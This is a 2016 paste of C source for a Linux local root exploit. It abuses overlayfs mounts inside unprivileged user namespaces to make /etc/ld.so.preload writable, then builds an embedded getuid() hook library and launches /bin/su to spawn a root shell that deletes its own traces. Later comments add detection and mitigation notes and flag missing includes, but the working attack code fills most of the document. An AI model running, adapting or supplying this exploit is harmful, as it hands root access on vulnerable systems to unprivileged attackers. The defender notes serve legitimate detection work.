
Untitled

a guest
Jun 26th, 2016
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <unistd.h>
  5. #include <sched.h>
  6. #include <sys/stat.h>
  7. #include <sys/types.h>
  8. #include <sys/mount.h>
  9. #include <stdio.h>
  10. #include <stdlib.h>
  11. #include <unistd.h>
  12. #include <sched.h>
  13. #include <sys/stat.h>
  14. #include <sys/types.h>
  15. #include <sys/mount.h>
  16. #include <sys/types.h>
  17. #include <signal.h>
  18. #include <fcntl.h>
  19. #include <string.h>
  20. #include <linux/sched.h>
  21.  
  /*
   * LIB is the C source text of a shared object that main() writes to
   * /tmp/ofs-lib.c and compiles to /tmp/ofs-lib.so. The object interposes
   * getuid(): it looks up the real getuid with dlsym((void *) -1, "getuid"),
   * reads the /proc/self/exe link, and, only when the effective UID is 0 and
   * the executable is /bin/su, it unlinks /etc/ld.so.preload and
   * /tmp/ofs-lib.so, sets the real/effective/saved UID and GID to 0 and
   * replaces the process with an interactive /bin/sh. In every other process
   * it just forwards to the real getuid().
   *
   * Defender notes:
   *  - The payload deletes its own preload entry and library once it has
   *    fired, so /etc/ld.so.preload and /tmp/ofs-lib.so may already be gone
   *    at triage time; rely on file-integrity or audit records for writes to
   *    /etc/ld.so.preload rather than on the file's current state.
   *  - A root "sh -i" whose parent context was /bin/su, with no successful
   *    authentication logged by su, is the process-level trace of this hook.
   *  - NOTE(review): the embedded source uses dlsym/strcmp/readlink without
   *    including <dlfcn.h> or <string.h>; main() passes -w to gcc, which
   *    hides the resulting warnings.
   */
  #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

  /* 1 MiB static buffer; main() passes its top address to clone() as the child's stack. */
  static char child_stack[1024*1024];
  25.  
  /*
   * clone() entry point. main() starts it with CLONE_NEWNS after
   * unshare(CLONE_NEWUSER), so every mount below happens in a private mount
   * namespace owned by an unprivileged user's user namespace.
   *
   * What the code does, in order:
   *  1. Recreates the scratch tree /tmp/ns_sploit/{work,upper,o}.
   *  2. Mount #1: overlays the scratch upper dir on a root-owned lower dir
   *     (/proc/sys/kernel with the legacy "overlayfs" type, else
   *     /sys/kernel/security/apparmor with the "overlay" type and a workdir)
   *     and renames one lower file (ns_last_pid or .access) to
   *     "ld.so.preload" inside the merged view.
   *  3. Mount #2: overlays /etc as the upper dir on top of the scratch upper
   *     dir, then chmods ld.so.preload to 0777 through the merged view.
   *
   * main() afterwards treats a successful write-open of /etc/ld.so.preload as
   * proof that step 3 took effect on the real /etc.
   * NOTE(review): that outcome presumably depends on the kernel creating the
   * renamed/copied-up file in the upper dir without re-checking the caller's
   * rights there; confirm against your distribution's overlayfs advisories.
   * The paste itself carries no advisory or CVE reference.
   *
   * Defender notes:
   *  - Preconditions visible here: unprivileged user namespaces and an
   *    overlay filesystem that is mountable from one (the error string below
   *    names FS_USERNS_MOUNT). Patching the kernel, restricting unprivileged
   *    user namespaces (e.g. user.max_user_namespaces, or
   *    kernel.unprivileged_userns_clone where the distribution provides it),
   *    or not loading the overlay module if unused each remove a precondition.
   *  - Observable artefacts: the /tmp/ns_sploit tree and overlay mounts whose
   *    upperdir is /etc.
   *
   * The function is declared int but has no return statement, and none of
   * the mkdir/chdir/rename/chmod/umount results are checked.
   */
  static int
  child_exec(void *stuff)
  {
      char *file;
      /* Start from a clean scratch tree; all four directories are world-accessible. */
      system("rm -rf /tmp/ns_sploit");
      mkdir("/tmp/ns_sploit", 0777);
      mkdir("/tmp/ns_sploit/work", 0777);
      mkdir("/tmp/ns_sploit/upper",0777);
      mkdir("/tmp/ns_sploit/o",0777);

      fprintf(stderr,"mount #1\n");
      /* Try the legacy filesystem type first; it takes no workdir option. */
      if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
          // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
          if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
              /* Neither type could be mounted from this namespace: give up. */
              fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
              exit(-1);
          }
          /* File name to rename when the apparmor directory is the lower dir. */
          file = ".access";
          chmod("/tmp/ns_sploit/work/work",0777);
      } else file = "ns_last_pid"; /* file name used with /proc/sys/kernel as lower dir */

      /* Rename the chosen lower file to ld.so.preload inside the merged view. */
      chdir("/tmp/ns_sploit/o");
      rename(file,"ld.so.preload");

      /* Leave the mount point before unmounting it. */
      chdir("/");
      umount("/tmp/ns_sploit/o");
      fprintf(stderr,"mount #2\n");
      /* Second overlay: the scratch upper dir is now the lower layer and /etc is the upper layer. */
      if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
          if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
              /* No diagnostic on this path; the parent only sees the later open() fail. */
              exit(-1);
          }
          chmod("/tmp/ns_sploit/work/work",0777);
      }

      /* Attribute change made through the merged view; main() later probes /etc/ld.so.preload for write access. */
      chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
      umount("/tmp/ns_sploit/o");
  }
  63.  
  /*
   * Driver. Process layout as written:
   *   parent -> wrapper (unshare(CLONE_NEWUSER)) -> init -> clone(child_exec,
   *   CLONE_NEWNS | SIGCHLD)
   * The namespace work happens in the descendants; the parent stays in the
   * initial namespaces, waits, and then checks whether /etc/ld.so.preload on
   * the real filesystem can be opened for writing.
   *
   * If it can, the parent writes the LIB source to /tmp/ofs-lib.c, builds
   * /tmp/ofs-lib.so with gcc, writes that path into /etc/ld.so.preload,
   * removes the scratch files and execs /bin/su. The dynamic loader consults
   * /etc/ld.so.preload for every dynamically linked program, set-uid ones
   * included, which is why the final exec target is a set-uid binary.
   *
   * Defender notes (detection):
   *  - File events: any write to /etc/ld.so.preload by a non-root UID; an
   *    audit watch such as "-w /etc/ld.so.preload -p wa" records it even
   *    though the payload later deletes the file.
   *  - Process events: an unprivileged process calling unshare/clone with
   *    CLONE_NEWUSER and CLONE_NEWNS, followed by mount(2) of an overlay
   *    filesystem, then gcc producing a .so under /tmp, then /bin/su.
   *  - Paths: /tmp/ns_sploit, /tmp/ofs-lib.c, /tmp/ofs-lib.so.
   *
   * NOTE(review): waitpid()/wait() are used without <sys/wait.h> in the
   * include list visible on the page, and argc/argv are unused.
   */
  int
  main(int argc, char **argv)
  {
      int status, fd, lib;
      pid_t wrapper, init;
      /* New mount namespace for the clone child; SIGCHLD so it can be waited for. */
      int clone_flags = CLONE_NEWNS | SIGCHLD;

      fprintf(stderr,"spawning threads\n");

      if((wrapper = fork()) == 0) {
          /* A failure here is only logged; execution continues regardless. */
          if(unshare(CLONE_NEWUSER) != 0)
              fprintf(stderr, "failed to create new user namespace\n");

          if((init = fork()) == 0) {
              /* The stack pointer is the top of the static buffer. */
              pid_t pid =
                  clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
              if(pid < 0) {
                  fprintf(stderr, "failed to create new mount namespace\n");
                  exit(-1);
              }

              waitpid(pid, &status, 0);

          }

          /* Reached by both the wrapper and the inner fork child (where init == 0). */
          waitpid(init, &status, 0);
          return 0;
      }

      /* Fixed 300 ms pause, then reap the wrapper. */
      usleep(300000);

      wait(NULL);

      fprintf(stderr,"child threads done\n");

      /* Success probe: an unprivileged write-open of this file should normally fail. */
      fd = open("/etc/ld.so.preload",O_WRONLY);

      if(fd == -1) {
          fprintf(stderr,"exploit failed\n");
          exit(-1);
      }

      fprintf(stderr,"/etc/ld.so.preload created\n");
      fprintf(stderr,"creating shared library\n");
      /* Drop the hook source into /tmp and build it; -w suppresses compiler warnings. */
      lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
      write(lib,LIB,strlen(LIB));
      close(lib);
      lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
      if(lib != 0) {
          fprintf(stderr,"couldn't create dynamic library\n");
          exit(-1);
      }
      /* 16 bytes: the library path plus the trailing newline. */
      write(fd,"/tmp/ofs-lib.so\n",16);
      close(fd);
      /* Removes the scratch tree and the .c file; the .so stays until the hook unlinks it. */
      system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
      /* su is started with the preload entry in place. */
      execl("/bin/su","su",NULL);
  }